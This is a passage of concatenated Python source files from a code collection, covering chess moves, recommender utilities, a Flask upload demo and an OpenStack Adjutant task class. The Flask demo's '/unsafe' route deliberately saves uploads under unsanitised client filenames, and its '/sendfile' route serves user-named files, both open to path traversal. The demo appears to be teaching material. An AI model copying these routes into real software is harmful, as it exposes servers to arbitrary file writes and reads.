        field[new[0]][new[1]-storlg] = 2*color if d == 1 else 0
        field[new[0]][rp] = 0 if d == 1 else 2*color
        cont = castling_control[color]
        castling_control[color] = (cont[0], cont[1]-storlg+d, cont[2]+storlg+d)
    castling_control[color] = (castling_control[color][0]+d, castling_control[color][1], castling_control[color][2])
def rook(field, color, old, new, d):
    """Maintain rook-moved counters when a rook leaves (d == 1) or returns to
    (d == -1) one of its home corner squares."""
    global castling_control
    hor = 0 if color == 1 else 7  # home rank for this color
    cont = castling_control[color]
    x, y = old if d == 1 else new
    # y % 7 == 0 matches the corner files 0 and 7; sign(y-3) picks which
    # counter (left vs right rook) is adjusted.
    if x == hor and y % 7 == 0:
        castling_control[color] = (cont[0], cont[1] + d*(-sign(y-3)+1), cont[2] + d*(sign(y-3)+1))
def trans_pawn(color, old):
    """True when a pawn of the given color is leaving its promotion-entry rank
    (rank 6 for white, rank 1 for black, folded into one modular test)."""
    return (old[0] * color) % 7 == 6
def take_on_aisle_pawn(color, old, new):
    """Record en-passant availability after a pawn move.

    A two-square advance marks (color, file) as capturable en passant; any
    other move resets the marker to the sentinel ('l', 8).
    """
    global take_on_aisle
    double_step = abs(new[0] - old[0]) == 2
    take_on_aisle = (color, new[1]) if double_step else ('l', 8)
    return take_on_aisle
def take_on_aisle_move(field, color, old, new, fig, d, main):
    """Handle the board side effects of en passant for a pawn move.

    main == 1 marks a real (not exploratory) move and refreshes the marker;
    a diagonal step removes (d == 1) or restores (d == -1) the bypassed pawn.
    """
    global take_on_aisle
    if main == 1:
        take_on_aisle_pawn(color, old, new)
    # Diagonal pawn step: candidate en-passant capture.
    if abs(old[1]-new[1]) == 1:
        if field[new[0]][new[1]] == 0 and d == 1:
            field[old[0]][new[1]] = 0  # remove the bypassed enemy pawn
        if fig == 0 and d == -1:
            field[new[0]][old[1]] = -color  # undo: restore the captured pawn
def move(field, old, new, fig=0, d=1, trans_fig=1, main=0):
    """Apply (d == 1) or undo (d == -1) a move from old to new on the board.

    fig is the piece code restored on the vacated square (the captured piece
    when undoing), trans_fig the piece a pawn promotes to, and main == 1
    marks a real move rather than a legality probe.
    """
    global trans, take_on_aisle
    color = sign(field[old[0]][old[1]])
    figure = abs(field[old[0]][old[1]])
    if figure == 2:
        rook(field, color, old, new, d)
    if figure == 6:
        king_and_castling(field, color, old, new, d)
    # Undoing a promotion: the promoted piece reverts to a pawn.
    if trans == True:
        figure = 1
        trans = False
    if figure == 1:
        trans = trans_pawn(color, old) if d == 1 else False
        if trans == True:
            figure = trans_fig  # promote the pawn
        take_on_aisle_move(field, color, old, new, fig, d, main)
        if main == 1:
            trans = False
    field[new[0]][new[1]] = color*figure
    field[old[0]][old[1]] = fig
|
7,673 | 52872804a069cd954bea247b64041eceafd8d139 | __author__ = 'Administrator'
#coding:utf-8
def calculate_score(calculation_params):
    """Score one dive: drop the two highest and two lowest of seven judge
    marks, sum the remaining three, and multiply by the difficulty.

    calculation_params is a dict with:
        "score_list": list of 7 judge marks (floats)
        "difficulty": float difficulty coefficient
    Returns a dict with the numeric "final_score" and a human-readable
    "expression" showing the calculation. The score list is sorted in place,
    matching the original side effect on the caller's list.
    """
    scores = calculation_params["score_list"]
    difficulty = calculation_params["difficulty"]
    scores.sort()
    middle = scores[2:5]
    total = sum(middle, 0.0)
    final_score = total * difficulty
    expression = "(" + " + ".join("%.1f" % mark for mark in middle)
    expression += ") * %.1f = %.1f" % (difficulty, final_score)
    return {"expression": expression, "final_score": final_score}
if __name__ == "__main__":
    # Python 2 demo invocation (print statement).
    calculation_params = {
        "score_list" : [1.0, 5.0, 3.0, 2.0, 9.0, 10.0, 2.0],
        "difficulty" : 3.6,
    }
    print calculate_score(calculation_params)
7,674 | 4958d6d88b762e6fbe860123b7274c16b6452605 | import sqlalchemy
from .base import Base
from sqlalchemy import Column, Integer, String, ForeignKey
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import relationship
class ModelSpellVariantPair(Base):
    """A pair of spell variants belonging to a class; owns its spells
    (deleting the pair cascades to them)."""
    __tablename__ = "spell_variant_pair"
    # Server-generated UUID primary key.
    uuid = Column(
        UUID(as_uuid=True),
        server_default=sqlalchemy.text("uuid_generate_v4()"),
        unique=True,
        nullable=False,
        primary_key=True,
    )
    # Owning class; rows are removed when the class is deleted.
    class_id = Column(
        UUID(as_uuid=True), ForeignKey("class.uuid", ondelete="CASCADE"), nullable=False
    )
    # Child spells; orphaned/deleted along with this pair.
    spells = relationship(
        "ModelSpell", backref="spell_variant_pair", cascade="all, delete-orphan"
    )
7,675 | af1eab58fd641b14ac054fa26e28d52c9741fb16 | import copy
import os
from datetime import datetime
import numpy as np
from sklearn.neighbors import NearestNeighbors
from sklearn.preprocessing import normalize
# Data files and train/validation split indices, relative to the repo root.
ROOT_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../')
DATA_FILE = os.path.join(ROOT_DIR, 'data/data_train.csv')
TRAINING_FILE_NAME = os.path.join(
    ROOT_DIR, 'data/trainingIndices.csv')
VALIDATION_FILE_NAME = os.path.join(
    ROOT_DIR, 'data/validationIndices.csv')
VALIDATION_MASK_FILE_NAME = os.path.join(
    ROOT_DIR, 'data/train_valid_80_10_10/validationIndices_mask.csv')
AUX = os.path.join(
    ROOT_DIR, 'data/train_valid_80_10_10/validationIndices_first.csv')
META_VALIDATION_FILE_NAME = os.path.join(
    ROOT_DIR, 'data/train_valid_80_10_10/validationIndices_second.csv')
SAMPLE_SUBMISSION = os.path.join(ROOT_DIR, \
    'data/sampleSubmission.csv')
ENSEMBLE_INPUT_DIR = 'data/stacking/good_data'
# Matrix dimensions and smoothing/imputation hyper-parameters.
ITEM_COUNT = 1000
USER_COUNT = 10000
WEIGHT_KNN = 0.001
N_NEIGHBORS = 3
USER_COUNT_WEIGHT = 10
SAVE_META_PREDICTIONS = False
def load_ratings(data_file=DATA_FILE):
    """Parse 'rX_cY,value' lines (after a header) into 0-based
    (row, col, rating) triples."""
    ratings = []
    with open(data_file, 'r') as file:
        _ = file.readline()  # skip header
        for line in file:
            key, value_string = line.split(",")
            row_part, col_part = key.split("_")
            ratings.append((int(row_part[1:]) - 1, int(col_part[1:]) - 1,
                            float(value_string)))
    return ratings
def ratings_to_matrix(ratings):
    """Scatter (row, col, rating) triples into a dense USER_COUNT x ITEM_COUNT
    matrix; unobserved entries stay zero."""
    matrix = np.zeros([USER_COUNT, ITEM_COUNT])
    for row, col, rating in ratings:
        matrix[row, col] = rating
    return matrix
def mask_validation(data, use_three_way):
    """Return a copy of data with the validation entries zeroed out."""
    masked = np.copy(data)
    mask_file = VALIDATION_MASK_FILE_NAME if use_three_way else VALIDATION_FILE_NAME
    for i, j in get_indices_from_file(mask_file):
        masked[i][j] = 0
    return masked
def get_validation_indices(use_three_way):
    """Indices of the validation split (the first split file when the data
    is partitioned three ways)."""
    source = AUX if use_three_way else VALIDATION_FILE_NAME
    return get_indices_from_file(source)
def get_meta_validation_indices():
    """Indices of the meta-validation (second) split used for stacking."""
    return get_indices_from_file(META_VALIDATION_FILE_NAME)
def get_observed_indices(data):
    """(row, col) pairs of the nonzero (observed) entries of data."""
    rows, cols = np.nonzero(data != 0)
    return list(zip(rows, cols))
def get_unobserved_indices(data):
    """(row, col) pairs of the zero (unobserved) entries of data."""
    rows, cols = np.nonzero(data == 0)
    return list(zip(rows, cols))
def get_indices_from_file(file_name):
    """Parse 'i,j' pairs (skipping the header line) into int tuples."""
    with open(file_name, 'r') as handle:
        lines = handle.readlines()
    pairs = []
    for line in lines[1:]:
        left, right = line.split(",")
        pairs.append((int(left), int(right)))
    return pairs
def get_indices_to_predict():
    """Get list of indices to predict from sample submission file.

    Returns:
        indices_to_predict: list of 0-based (row, col) tuples"""
    pairs = []
    with open(SAMPLE_SUBMISSION, 'r') as file:
        _ = file.readline()  # skip header
        for line in file:
            key, _ = line.split(",")
            row_part, col_part = key.split("_")
            pairs.append((int(row_part[1:]) - 1, int(col_part[1:]) - 1))
    return pairs
def write_ratings(predictions, submission_file):
    """Write (row, col, rating) triples in the Kaggle submission format."""
    with open(submission_file, 'w') as out:
        out.write('Id,Prediction\n')
        out.writelines('r%d_c%d,%f\n' % (i, j, value) for i, j, value in predictions)
def reconstruction_to_predictions(
        reconstruction, submission_file, indices_to_predict=None):
    """Write predictions for the given indices (default: the submission
    indices), read off the reconstruction matrix and shifted to 1-based ids."""
    if indices_to_predict is None:
        indices_to_predict = get_indices_to_predict()
    predictions = [(i + 1, j + 1, reconstruction[i, j])
                   for i, j in indices_to_predict]
    write_ratings(predictions, submission_file)
def save_ensembling_predictions(reconstruction, name):
    """Dump timestamped meta-training and meta-validation prediction files
    for the stacking ensemble."""
    reconstruction_to_predictions(
        reconstruction,
        ROOT_DIR + 'data/meta_training_' + name + '_stacking'
        + datetime.now().strftime('%Y-%b-%d-%H-%M-%S') + '.csv',
        indices_to_predict=get_validation_indices(use_three_way=True))
    reconstruction_to_predictions(
        reconstruction,
        ROOT_DIR + 'data/meta_validation_' + name + '_stacking'
        + datetime.now().strftime('%Y-%b-%d-%H-%M-%S') + '.csv',
        indices_to_predict=get_meta_validation_indices())
def clip(data):
    """Clamp ratings into the valid [1, 5] range, in place, and return data."""
    return np.clip(data, 1, 5, out=data)
def ampute_reconstruction(reconstruction, data):
    """Overwrite reconstruction with the known ratings wherever data is observed."""
    for i, j in get_observed_indices(data):
        reconstruction[i][j] = data[i][j]
def impute_by_avg(data, by_row):
    """Fill zero entries with the mean of the observed entries along one axis.

    by_row=False averages within each row, by_row=True within each column
    (via a transposed view). Mutates data in place and returns it.
    """
    matrix = data.T if by_row else data
    for vec in matrix:
        missing = vec == 0
        observed_mean = np.sum(vec) / np.count_nonzero(vec)
        vec[missing] = observed_mean
    return matrix.T if by_row else matrix
def impute_by_bias(data):
    """Fill unobserved entries with global mean + row bias + column bias.

    Biases are each row's / column's observed mean minus the global observed
    mean. Mutates data in place and returns it.

    Bug fix: column biases were computed from ``data[:][col_index]``, which
    slices a copy of the whole matrix and then indexes a ROW -- i.e. it read
    the row at col_index, not the column. Use ``data[:, col_index]``.
    """
    total_average = np.mean(data[np.nonzero(data)])
    row_biases = np.zeros(data.shape[0])
    col_biases = np.zeros(data.shape[1])
    for row_index in range(data.shape[0]):
        row_biases[row_index] = np.sum(data[row_index]) / \
            np.count_nonzero(data[row_index]) - total_average
    for col_index in range(data.shape[1]):
        col_biases[col_index] = np.sum(data[:, col_index]) / \
            np.count_nonzero(data[:, col_index]) - total_average
    for row_index in range(data.shape[0]):
        for col_index in range(data.shape[1]):
            if data[row_index, col_index] == 0:
                # Additive bias model for the missing entry.
                data[row_index, col_index] = total_average + \
                    row_biases[row_index] + col_biases[col_index]
    return data
def impute_by_variance(data):
    """Impute ratings from variance-weighted movie means and user deviations.

    Movie means and user deviations are shrunk toward the global average in
    proportion to their variance relative to the global variance, then
    blended per cell by how many ratings the movie vs the user has.
    NOTE(review): this overwrites ALL entries (observed ones included) with
    the blended estimate -- confirm that is intended by the callers.
    """
    global_average = np.sum(data) / np.count_nonzero(data)
    global_variance = np.var(data[data != 0])
    adjusted_movie_means = np.zeros((data.shape[1],))
    for i in range(data.shape[1]):
        movie_ratings = data[:, i]
        movie_ratings = movie_ratings[movie_ratings != 0]
        movie_variance = np.var(movie_ratings)
        relative_variance = movie_variance / global_variance
        # Shrinkage: high-variance movies lean more on the global average.
        adjusted_movie_means[i] = (
            global_average * relative_variance + np.sum(movie_ratings)) / (
            relative_variance + np.count_nonzero(movie_ratings))
    adjusted_user_deviation = np.zeros((data.shape[0],))
    for i in range(data.shape[0]):
        user_ratings = data[i]
        user_deviations = adjusted_movie_means - user_ratings
        user_deviations = user_deviations[user_ratings != 0]
        user_deviation_variance = np.var(user_deviations)
        relative_variance = user_deviation_variance / global_variance
        adjusted_user_deviation[i] = (
            global_average * relative_variance + sum(user_deviations)) / (
            relative_variance + np.count_nonzero(user_deviations))
    user_counts = np.count_nonzero(data, axis=1)
    movie_counts = np.count_nonzero(data, axis=0)
    movie_count_matrix = np.tile(movie_counts, (len(user_counts), 1))
    user_count_matrix = np.tile(user_counts, (len(movie_counts), 1)).T
    # Per-cell mixing weight: fraction of evidence coming from the movie side
    # (user counts are amplified by USER_COUNT_WEIGHT).
    combined_matrix = copy.copy(
        movie_count_matrix) + USER_COUNT_WEIGHT * copy.copy(user_count_matrix)
    d_matrix = np.divide(movie_count_matrix, combined_matrix)
    m_matrix = np.tile(
        adjusted_movie_means, (len(adjusted_user_deviation), 1))
    u_matrix = np.tile(
        adjusted_user_deviation, (len(adjusted_movie_means), 1)).T
    data = np.multiply(m_matrix, d_matrix) + \
        np.multiply(u_matrix, np.ones(d_matrix.shape) - d_matrix)
    return data
def compute_rmse(data, prediction, indices=None):
    """Root-mean-square error between data and prediction over the given
    (row, col) pairs; defaults to the validation indices on disk."""
    if indices is None:
        indices = get_indices_from_file(VALIDATION_FILE_NAME)
    total = 0.0
    for row, col in indices:
        diff = data[row][col] - prediction[row][col]
        total += diff * diff
    return np.sqrt(total / len(indices))
def knn_smoothing(reconstruction, user_embeddings):
    """Blend each user's predicted ratings with those of similar users.

    Finds the N_NEIGHBORS nearest users by cosine distance on normalized
    embeddings, weights neighbors by similarity**4, and mixes the weighted
    neighbor average into each user's row with weight WEIGHT_KNN, clipping
    the result back into [1, 5].
    """
    normalized_user_embeddings = normalize(user_embeddings)
    # +1 because each point's nearest neighbor is itself; dropped below.
    knn = NearestNeighbors(n_neighbors=N_NEIGHBORS + 1)
    knn.fit(normalized_user_embeddings)
    distances, neighbors = knn.kneighbors(normalized_user_embeddings)
    distances = distances[:, 1:]
    neighbors = neighbors[:, 1:]
    ones = np.ones(distances.shape)
    similarities = ones - distances
    # Fourth power sharpens the weighting toward the closest neighbors.
    weights = np.square(np.square(similarities))
    smoothed_data = np.zeros(reconstruction.shape)
    aggregated_neighbor_ratings = np.zeros(reconstruction.shape)
    for i in range(reconstruction.shape[0]):
        stacked_ratings = []
        for neighbor in neighbors[i]:
            stacked_ratings.append(reconstruction[neighbor])
        stacked_ratings = np.asarray(stacked_ratings)
        # Weighted average of the neighbors' rating rows.
        aggregated_neighbor_ratings[i] =\
            np.matmul(weights[i], stacked_ratings) / sum(weights[i])
    for i in range(reconstruction.shape[0]):
        smoothed_data[i] = (1 - WEIGHT_KNN) * reconstruction[i] + WEIGHT_KNN *\
            aggregated_neighbor_ratings[i]
    smoothed_data = clip(smoothed_data)
    return smoothed_data
def load_predictions_from_files(file_prefix='submission_'):
    """Load every prediction file under the ensemble input directory whose
    name contains file_prefix, and return the parsed rating matrices."""
    directory = os.path.join(ROOT_DIR, ENSEMBLE_INPUT_DIR)
    matrices = []
    for entry in os.listdir(directory):
        candidate = os.path.join(directory, entry)
        if not (os.path.isfile(candidate) and file_prefix in entry):
            continue
        print("loading {}".format(candidate))
        matrices.append(ratings_to_matrix(load_ratings(candidate)))
    return matrices
def compute_mean_predictions(all_ratings):
    """Average a list of rating matrices elementwise, then impute any
    remaining gaps column-wise."""
    stacked = np.array(all_ratings)
    averaged = stacked.mean(axis=0)
    return impute_by_avg(averaged, by_row=False)
|
7,676 | 87562ce2a957de3fa2eb84cbb0de18c6ce264c6b | # -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
import unittest
from pycmbs import data4D
class TestPycmbsData4D(unittest.TestCase):
    """Placeholder test case for the pycmbs.data4D module."""
    def setUp(self):
        # No fixtures required yet.
        pass
    def test_DummyTest(self):
        # Placeholder so the runner has at least one passing test.
        pass
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
7,677 | 3e19ede2112a109a776b607e927e2f0a095ba5cc | from .__init__ import *
def surfaceAreaCone(maxRadius=20, maxHeight=50, unit='m'):
a = random.randint(1, maxHeight)
b = random.randint(1, maxRadius)
slopingHeight = math.sqrt(a**2 + b**2)
problem = f"Surface area of cone with height = {a}{unit} and radius = {b}{unit} is"
ans = int(math.pi * b * slopingHeight + math.pi * b * b)
solution = f"{ans} {unit}^2"
return problem, solution
# Register the generator (id 38) with a template problem/solution pair.
surface_area_cone = Generator(
    "Surface Area of cone", 38,
    "Surface area of cone with height = a units and radius = b units is",
    "c units^2", surfaceAreaCone)
|
7,678 | d27a7ca04e12d50aca5a9f9db199102dbeb4e9f1 | from django.http import JsonResponse
from django.shortcuts import render
from phone_number_parser.forms import TextForm
import re
def parse_text(request):
    """Single view for the phone-number parser.

    GET renders a form with one textarea field. POST receives the text via
    an ajax call in the field 'the_text', extracts phone numbers with a
    regex, and returns them as a JSON object. See main.js for the ajax
    request and its success callback.
    """
    if request.method == 'POST':
        text = request.POST.get('the_text')
        pattern = r'\(?(\d{3})\)?[\.\-]?\s*(\d{3})\s*[\.\-]?\s*(\d{4})'
        phone_number_list = [
            '({}) {}-{}'.format(area, prefix, line)
            for area, prefix, line in re.findall(pattern, text)
        ]
        return JsonResponse({'phone_number_list': phone_number_list})
    form = TextForm()
    return render(request, 'phone_number_parser/index.html', {'form': form})
|
7,679 | 9f6cfeff9e00079715827a2887263c14a1bb51ff | import os, tempfile, shutil
from flask import Flask, flash, request, redirect, url_for, send_from_directory, send_file
from werkzeug.utils import secure_filename
from contextlib import contextmanager
"""
Flask stores uploaded FileStorage objects in memory if they are small. Otherwise, it internally uses tempfile.gettempdir() which returns the globally
configured temporary directory that tempfile is using.
WARNING: Flask accepts an unlimited file size unless I limit it
Flask encourages the use of <FileStorage>.save() to save uploaded files on the server. Afterwards, I can interact with the files normally. There does
not appear to be an easy way to directly interact with a FileStorage object with such functions as open()
"""
#UPLOAD_FOLDER = './uploads'
ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
app = Flask(__name__)
# Limit the file size fo 16 MB
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
# I want each user to have their own upload folder
#app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def allowed_file(filename):
    """Return True when filename has an extension listed in ALLOWED_EXTENSIONS."""
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1].lower()
    return extension in ALLOWED_EXTENSIONS
"""
Upload a text file and the server will process the file by writing a single line to it and returning the modified file. The temporary directory where
the file was saved (and modified) is deleted at the end of the request. It works exactly as expected! Try stepping through it.
"""
@app.route('/', methods=['GET', 'POST'])
def upload_file():
    """GET: render the upload form. POST: save the uploaded file into a
    temporary directory, write a line into it, and return the modified
    file; the temporary directory is deleted when the request ends.
    """
    if request.method == 'POST':
        # check if the post request has the file part
        if 'file' not in request.files:
            flash('No file part')
            return redirect(request.url)
        f = request.files['file']
        # if the user does not select file, browser should also submit an empty part without filename
        if f.filename == '':
            flash('No selected file')
            return redirect(request.url)
        if f and allowed_file(f.filename):
            """
            This code is fine because 'with' acts like a finally block. The context manager will always exit (unless the program abnormally
            terminates), even if an exception is thrown or return is called within the 'with' block. Thus, I can send the processed file to the
            client and then the entire directory will be deleted.
            """
            filename = secure_filename(f.filename)
            with TemporaryDirectory() as temp_dir:
                print("temp_dir was: " + temp_dir)
                path = os.path.join(temp_dir, filename)
                f.save(path)
                #f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
                # NOTE(review): mode "r+" writes at offset 0, so this overwrites
                # the beginning of the upload rather than appending — confirm intent.
                with open(path, "r+") as my_file:
                    my_file.write("The server wrote this line.\n")
                return send_from_directory(temp_dir, filename)
                #return redirect(url_for('uploaded_file', filename=filename))
    return '''
    <!doctype html>
    <title>Upload new File</title>
    <h1>Upload new File</h1>
    <form method=post enctype=multipart/form-data>
      <input type=file name=file>
      <input type=submit value=Upload>
    </form>
    '''
# Send the uploaded file right back to the user as an example. I don't do this because I process the file and spit it back to the user
"""
@app.route('/uploads/<filename>')
def uploaded_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
"""
# Create a context manager to deal with automatically deleting the temporary directory when the 'with' statement exists
@contextmanager
def TemporaryDirectory():
    """Context manager yielding a fresh temporary directory.

    The directory and its contents are removed on exit, even when the
    with-block raises or returns early.
    """
    path = tempfile.mkdtemp()
    try:
        yield path
    finally:
        shutil.rmtree(path)
@app.route("/safe", methods=["POST"])
def safe():
    """Save an uploaded file under ./uploads using a sanitised filename."""
    uploaded = request.files["file-form-param"]
    safe_name = secure_filename(uploaded.filename)
    destination = os.path.join(os.path.dirname(__file__), "uploads", safe_name)
    uploaded.save(destination)
    return str({
        "filename": safe_name,
        "saved at": destination
    })
@app.route("/unsafe", methods=["POST"])
def unsafe():
    """Save an upload using the client-supplied filename verbatim.

    NOTE: deliberately skips secure_filename() to demonstrate the path
    traversal risk; do not copy this pattern into real code.
    """
    uploaded = request.files["file-form-param"]
    destination = os.path.join(os.path.dirname(__file__), "uploads", uploaded.filename)
    uploaded.save(destination)
    return str({
        "filename": uploaded.filename,
        "saved at": destination
    })
@app.route("/sendfile", methods=["POST"])
def send_file_py():
    """Return the requested file from ./uploads via flask.send_file."""
    requested = request.form.get("filename")
    uploads_dir = os.path.join(os.path.dirname(__file__), "uploads")
    return send_file(os.path.join(uploads_dir, requested))
@app.route("/sendfromdirectory", methods=["POST"])
def send_from_directory_py():
    """Return the requested file from ./uploads via send_from_directory."""
    requested = request.form.get("filename")
    uploads_dir = os.path.join(os.path.dirname(__file__), "uploads")
    return send_from_directory(uploads_dir, requested)
|
7,680 | 26a6fe0b2a98aa77b63a336cd6c2afcfe81d9058 | #!/usr/bin/env python3
import os
import subprocess
import emailgen
#
# Header information
#
recipient = input("recipient: ")
sender = input("sender: ")
# NOTE(review): the password is echoed in plain text as typed;
# getpass.getpass would hide it — confirm before changing behaviour.
password = input("sender password: ")
subject = "hdd temp alert"
#
# Get hdd temp, format for email
#
output = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc', shell=True)
text = output.decode('utf-8')
#
# Email requires ascii
#
text = text.encode('ascii','ignore')
text = text.decode('ascii')
#
# Add descriptive information to text
#
text += "\nHostname: " + os.uname().nodename
#
# Call sendAlert function
#
emailgen.sendAlert(recipient, subject, text, sender, password)
|
7,681 | cc23eeed44ff66d68c700163cca8b9f4986d497d | # Copyright (C) 2019 Catalyst Cloud Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import hashlib
from logging import getLogger
from confspirator import groups
from confspirator import fields
from adjutant import actions as adj_actions
from adjutant.api.models import Task
from adjutant.config import CONF
from django.utils import timezone
from adjutant.notifications.utils import create_notification
from adjutant.tasks.v1.utils import send_stage_email, create_token, handle_task_error
from adjutant import exceptions
def make_task_config(task_class):
    """Build the dynamic config group for a task class.

    Every child config defaults to the matching ``task_class`` attribute,
    so a deployment only needs to override what differs from the task's
    own defaults.
    """
    config_group = groups.DynamicNameConfigGroup()
    config_group.register_child_config(
        fields.BoolConfig(
            "allow_auto_approve",
            help_text="Override if this task allows auto_approval. "
            "Otherwise uses task default.",
            default=task_class.allow_auto_approve,
        )
    )
    config_group.register_child_config(
        fields.ListConfig(
            "additional_actions",
            help_text="Additional actions to be run as part of the task "
            "after default actions.",
            default=task_class.additional_actions or [],
        )
    )
    config_group.register_child_config(
        fields.IntConfig(
            "token_expiry",
            help_text="Override for the task token expiry. "
            "Otherwise uses task default.",
            default=task_class.token_expiry,
        )
    )
    config_group.register_child_config(
        fields.DictConfig(
            "actions",
            help_text="Action config overrides over the action defaults. "
            "See 'adjutant.workflow.action_defaults'.",
            is_json=True,
            default=task_class.action_config or {},
            sample_default={
                "SomeCustomAction": {"some_action_setting": "<a-uuid-probably>"}
            },
        )
    )
    config_group.register_child_config(
        fields.DictConfig(
            "emails",
            help_text="Email config overrides for this task over task defaults."
            "See 'adjutant.workflow.emails'.",
            is_json=True,
            default=task_class.email_config or {},
            sample_default={
                "initial": None,
                "token": {
                    "subject": "Some custom subject",
                },
            },
        )
    )
    config_group.register_child_config(
        fields.DictConfig(
            "notifications",
            help_text="Notification config overrides for this task over task defaults."
            "See 'adjutant.workflow.notifications'.",
            is_json=True,
            default=task_class.notification_config or {},
            sample_default={
                "standard_handlers": ["EmailNotification"],
                "error_handlers": ["EmailNotification"],
                "standard_handler_config": {
                    "EmailNotification": {
                        "emails": ["example@example.com"],
                        "reply": "no-reply@example.com",
                    }
                },
                "error_handler_config": {
                    "EmailNotification": {
                        "emails": ["example@example.com"],
                        "reply": "no-reply@example.com",
                    }
                },
            },
        )
    )
    return config_group
class BaseTask(object):
    """
    Base class for in memory task representation.
    This serves as the internal task logic handler, and is used to
    define what a task looks like.
    Most of the time this class shouldn't be called or used directly
    as the task manager is what handles the direct interaction to the
    logic here, and includes some wrapper logic to help deal with workflows.
    """

    # required values in custom task
    task_type = None
    default_actions = None
    # default values to optionally override in task definition
    deprecated_task_types = None
    duplicate_policy = "cancel"
    send_approval_notification = True
    token_requires_authentication = False
    # config defaults for the task (used to generate default config):
    allow_auto_approve = True
    additional_actions = None
    token_expiry = None
    action_config = None
    email_config = None
    notification_config = None

    def __init__(self, task_model=None, task_data=None, action_data=None):
        """Wrap an existing task model, or create a new task from action data.

        With ``task_model`` the task is rehydrated from the database;
        otherwise the action serializers are validated, duplicates are
        handled, and a new Task row plus its action objects are created.
        """
        self._config = None
        self.logger = getLogger("adjutant")
        if task_model:
            self.task = task_model
            self._refresh_actions()
        else:
            # raises 400 validation error
            action_serializer_list = self._instantiate_action_serializers(action_data)
            hash_key = self._create_task_hash(action_serializer_list)
            # raises duplicate error
            self._handle_duplicates(hash_key)
            keystone_user = task_data.get("keystone_user", {})
            self.task = Task.objects.create(
                keystone_user=keystone_user,
                project_id=keystone_user.get("project_id"),
                task_type=self.task_type,
                hash_key=hash_key,
            )
            self.task.save()
            # Instantiate actions with serializers
            self.actions = []
            for i, action in enumerate(action_serializer_list):
                data = action["serializer"].validated_data
                # construct the action class
                self.actions.append(
                    action["action"](data=data, task=self.task, order=i)
                )
            self.logger.info(
                "(%s) - '%s' task created (%s)."
                % (timezone.now(), self.task_type, self.task.uuid)
            )

    def _instantiate_action_serializers(self, action_data, use_existing_actions=False):
        """Build {name, action, serializer} entries for the task's actions.

        Validates each serializer against ``action_data``. Raises
        SerializerMissingException when an action has no serializer, and
        TaskSerializersInvalid with the combined errors if any serializer
        fails validation.
        """
        action_serializer_list = []
        if use_existing_actions:
            actions = self.actions
        else:
            actions = self.default_actions[:]
            actions += self.config.additional_actions
        # instantiate all action serializers and check validity
        valid = True
        for action in actions:
            if use_existing_actions:
                action_name = action.action.action_name
            else:
                action_name = action
            action_class = adj_actions.ACTION_CLASSES[action_name]
            if use_existing_actions:
                action_class = action
            # instantiate serializer class
            if not action_class.serializer:
                raise exceptions.SerializerMissingException(
                    "No serializer defined for action %s" % action_name
                )
            serializer = action_class.serializer(data=action_data)
            action_serializer_list.append(
                {"name": action_name, "action": action_class, "serializer": serializer}
            )
            if serializer and not serializer.is_valid():
                valid = False
        if not valid:
            errors = {}
            for action in action_serializer_list:
                if action["serializer"]:
                    errors.update(action["serializer"].errors)
            raise exceptions.TaskSerializersInvalid(errors)
        return action_serializer_list

    def _create_task_hash(self, action_list):
        """Return a sha256 hex digest identifying the task by its type and
        validated action data; used for duplicate detection."""
        hashable_list = [
            self.task_type,
        ]
        for action in action_list:
            hashable_list.append(action["name"])
            if not action["serializer"]:
                continue
            # iterate like this to maintain consistent order for hash
            fields = sorted(action["serializer"].validated_data.keys())
            for field in fields:
                try:
                    hashable_list.append(action["serializer"].validated_data[field])
                except KeyError:
                    if field == "username" and CONF.identity.username_is_email:
                        continue
                    else:
                        raise
        return hashlib.sha256(str(hashable_list).encode("utf-8")).hexdigest()

    def _handle_duplicates(self, hash_key):
        """Deal with live tasks sharing this hash: cancel them under the
        "cancel" policy, otherwise raise TaskDuplicateFound."""
        duplicate_tasks = Task.objects.filter(
            hash_key=hash_key, completed=0, cancelled=0
        )
        if not duplicate_tasks:
            return
        if self.duplicate_policy == "cancel":
            now = timezone.now()
            self.logger.info("(%s) - Task is a duplicate - Cancelling old tasks." % now)
            for task in duplicate_tasks:
                task.add_task_note(
                    "Task cancelled because was an old duplicate. - (%s)" % now
                )
                task.get_task().cancel()
            return
        raise exceptions.TaskDuplicateFound()

    def _refresh_actions(self):
        # Rebuild the in-memory action objects from the stored task actions.
        self.actions = [a.get_action() for a in self.task.actions]

    def _create_token(self):
        """Invalidate existing tokens, create a fresh one and email it."""
        self.clear_tokens()
        token_expiry = self.config.token_expiry or self.token_expiry
        token = create_token(self.task, token_expiry)
        self.add_note("Token created for task.")
        try:
            # will throw a key error if the token template has not
            # been specified
            email_conf = self.config.emails.token
            send_stage_email(self.task, email_conf, token)
        except KeyError as e:
            handle_task_error(e, self.task, error_text="while sending token")

    def add_note(self, note):
        """
        Logs the note, and also adds it to the task notes.
        """
        now = timezone.now()
        self.logger.info(
            "(%s)(%s)(%s) - %s" % (now, self.task_type, self.task.uuid, note)
        )
        note = "%s - (%s)" % (note, now)
        self.task.add_task_note(note)

    @property
    def config(self):
        """Get my config.
        Returns a dict of the config for this task, lazily built by
        overlaying this task type's config onto the task defaults.
        """
        if self._config is None:
            try:
                task_conf = CONF.workflow.tasks[self.task_type]
            except KeyError:
                task_conf = {}
            self._config = CONF.workflow.task_defaults.overlay(task_conf)
        return self._config

    def is_valid(self, internal_message=None):
        """Raise TaskActionsInvalid unless every action reports valid."""
        self._refresh_actions()
